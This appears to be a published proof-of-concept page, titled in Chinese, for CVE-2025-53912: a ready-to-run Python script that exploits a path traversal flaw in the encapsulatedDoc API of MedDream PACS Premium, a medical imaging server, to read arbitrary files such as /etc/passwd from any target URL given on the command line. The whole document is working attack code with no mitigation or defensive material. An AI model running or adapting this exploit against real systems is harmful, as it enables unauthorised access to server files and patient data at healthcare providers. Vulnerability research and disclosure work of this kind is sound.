CVE-2025-53912 MedDream PACS Premium 任意文件读取漏洞

import requests import sys # CVE-2025-53912 PoC - MedDream PACS Premium Arbitrary File Read # Target: MedDream PACS Premium 7.3.6.870 # Vulnerability: Unvalidated file path in encapsulatedDoc functionality def exploit_file_read(target_url, file_path): """ Exploit arbitrary file read vulnerability in MedDream PACS Premium Args: target_url: Base URL of the vulnerable MedDream server file_path: Path to the file to read (e.g., ../../../../etc/passwd) Returns: File contents if successful, None otherwise """ # Construct the malicious request targeting encapsulatedDoc endpoint exploit_url = f"{target_url}/pacs/api/encapsulatedDoc" # Payload with path traversal to read arbitrary files params = { 'documentId': file_path, 'type': 'application/octet-stream' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*', 'Connection': 'close' } try: print(f"[*] Sending exploit request to: {exploit_url}") print(f"[*] Attempting to read: {file_path}") response = requests.get(exploit_url, params=params, headers=headers, timeout=30) if response.status_code == 200: print(f"[+] Success! File contents retrieved ({len(response.content)} bytes)") return response.content else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {str(e)}") return None def main(): if len(sys.argv) < 3: print("Usage: python cve-2025-53912_poc.py <target_url> <file_path>") print("Example: python cve-2025-53912_poc.py http://target.com /etc/passwd") sys.exit(1) target_url = sys.argv[1].rstrip('/') file_path = sys.argv[2] result = exploit_file_read(target_url, file_path) if result: print("\n[+] File Contents:") print("=" * 60) try: print(result.decode('utf-8')) except: print(result) print("=" * 60) if __name__ == "__main__": main()